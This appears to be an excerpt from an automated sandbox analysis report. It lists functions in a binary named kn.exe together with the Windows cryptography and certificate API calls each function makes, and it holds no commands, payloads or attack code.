Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97124 BCryptGenerateKeyPair,#360,	6_2_00007FF6A2A97124
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A61058 NCryptOpenStorageProvider,#205,#359,#357,	6_2_00007FF6A2A61058
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9705C BCryptGetProperty,#360,	6_2_00007FF6A2A9705C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,	6_2_00007FF6A2A2B098
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A6B0A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A0107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,	6_2_00007FF6A2A0107C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96DE0 NCryptCreatePersistedKey,#360,	6_2_00007FF6A2A96DE0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A44DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF6A2A44DDC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A88DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,	6_2_00007FF6A2A88DD0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60DD4 NCryptGetProperty,#205,#359,#357,#359,#357,	6_2_00007FF6A2A60DD4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,	6_2_00007FF6A2AB0DB8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29F0E24
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A92DAC #357,#357,CryptFindOIDInfo,LocalFree,	6_2_00007FF6A2A92DAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A62D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6A2A62D78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96D78 NCryptOpenKey,#360,	6_2_00007FF6A2A96D78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60D84 NCryptFreeObject,#205,#357,	6_2_00007FF6A2A60D84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A60EF4 NCryptImportKey,#205,#359,#359,#357,	6_2_00007FF6A2A60EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AC0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,	6_2_00007FF6A2AC0ED0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,	6_2_00007FF6A29F8F1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96F2C NCryptExportKey,#360,	6_2_00007FF6A2A96F2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A62E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,	6_2_00007FF6A2A62E6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AA4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,	6_2_00007FF6A2AA4E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96E48 NCryptSetProperty,#360,	6_2_00007FF6A2A96E48
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A96EA8 NCryptImportKey,#360,	6_2_00007FF6A2A96EA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8EE94 CryptSignMessage,SetLastError,	6_2_00007FF6A2A8EE94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A00E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,	6_2_00007FF6A2A00E94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A32E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF6A2A32E7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A453E8 CryptEncodeObjectEx,GetLastError,#357,	6_2_00007FF6A2A453E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A213F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF6A2A213F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF6A2A4B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A6342C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF6A2A9141C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,	6_2_00007FF6A29EB36C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,	6_2_00007FF6A29F7340
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A1B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,	6_2_00007FF6A2A1B350
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A25338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6A2A25338
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A733B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,	6_2_00007FF6A2A733B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A993A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6A2A993A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A433A0 CryptVerifyCertificateSignature,CertCompareCertificateName,	6_2_00007FF6A2A433A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A9739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,	6_2_00007FF6A2A9739C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A63390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF6A2A63390
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7B4EC CryptDecodeObjectEx,SetLastError,	6_2_00007FF6A2A7B4EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A914F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF6A2A914F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A634F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF6A2A634F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A23504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,	6_2_00007FF6A2A23504
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7B464 CryptEncodeObjectEx,SetLastError,	6_2_00007FF6A2A7B464
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29C5438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,	6_2_00007FF6A29C5438
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8F4A0 CryptHashPublicKeyInfo,SetLastError,	6_2_00007FF6A2A8F4A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,	6_2_00007FF6A2A4F488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A69480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A69480
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A611C8 NCryptVerifySignature,#205,#357,#357,#357,#357,	6_2_00007FF6A2A611C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A971C8 BCryptDestroyKey,#360,	6_2_00007FF6A2A971C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A631C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6A2A631C0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,	6_2_00007FF6A2A97214
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2AB9208 #357,NCryptEnumKeys,#360,#358,	6_2_00007FF6A2AB9208
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,	6_2_00007FF6A2A4F168
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A45164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF6A2A45164
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A351A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A2A351A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A43188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,	6_2_00007FF6A2A43188
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97178 BCryptCloseAlgorithmProvider,#360,	6_2_00007FF6A2A97178
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A5F2F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A392D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,	6_2_00007FF6A2A392D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A432D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF6A2A432D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A292C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,	6_2_00007FF6A2A292C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,	6_2_00007FF6A29FB324
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29FD304
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,	6_2_00007FF6A2A4D30C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FD240 #357,CryptFindOIDInfo,#357,LocalFree,	6_2_00007FF6A29FD240
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A632A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6A2A632A8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,	6_2_00007FF6A2A2B2B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A97290 NCryptIsKeyHandle,#359,#360,#357,#358,	6_2_00007FF6A2A97290
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,	6_2_00007FF6A2A8D28C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A797E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,	6_2_00007FF6A2A797E4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A017D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,	6_2_00007FF6A2A017D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,	6_2_00007FF6A2A4B808
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF6A29FF810
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,	6_2_00007FF6A2A8F7FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A65768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A65768
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,	6_2_00007FF6A2A2F774
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,	6_2_00007FF6A2A8D750
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A637A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A637A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7B794 CryptExportPublicKeyInfoEx,SetLastError,	6_2_00007FF6A2A7B794
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3577C #360,#358,CryptDecodeObject,GetLastError,#357,	6_2_00007FF6A2A3577C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,	6_2_00007FF6A29FD790
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29DB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,	6_2_00007FF6A29DB788
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A318DC CertFindExtension,CryptDecodeObject,GetLastError,#357,	6_2_00007FF6A2A318DC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B8D0 I_CryptGetLruEntryData,#357,	6_2_00007FF6A2A4B8D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29E3918
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,	6_2_00007FF6A2A6391C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,	6_2_00007FF6A2A8F918
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF6A29D38FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A63860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A63860
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,	6_2_00007FF6A2A5184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,	6_2_00007FF6A2A4D850
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A998B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6A2A998B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,	6_2_00007FF6A29F7884
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A39878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,	6_2_00007FF6A2A39878
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A255F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,	6_2_00007FF6A2A255F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29ED5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6A29ED5C2
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29EF630 CryptAcquireContextW,GetLastError,#357,SetLastError,	6_2_00007FF6A29EF630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A495FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,	6_2_00007FF6A2A495FC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8F570 CryptHashCertificate,SetLastError,	6_2_00007FF6A2A8F570
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A2B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,	6_2_00007FF6A2A2B55C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A63590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A63590
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A99580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,	6_2_00007FF6A2A99580
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A636E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF6A2A636E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,	6_2_00007FF6A2A4F6D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29D5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,	6_2_00007FF6A29D5664
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A3366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,	6_2_00007FF6A2A3366C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29ED660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,	6_2_00007FF6A29ED660
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A4B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,	6_2_00007FF6A2A4B664
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A8F650 CryptHashCertificate2,SetLastError,	6_2_00007FF6A2A8F650
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A63654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,	6_2_00007FF6A2A63654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A5F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A5F644
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A176B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6A2A176B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A7D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,	6_2_00007FF6A2A7D6A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A89688 CryptFindOIDInfo,#357,#360,#360,#360,	6_2_00007FF6A2A89688
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A63BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF6A2A63BEB
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,	6_2_00007FF6A29E9BC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A6BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,	6_2_00007FF6A2A6BBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,	6_2_00007FF6A29FFC20
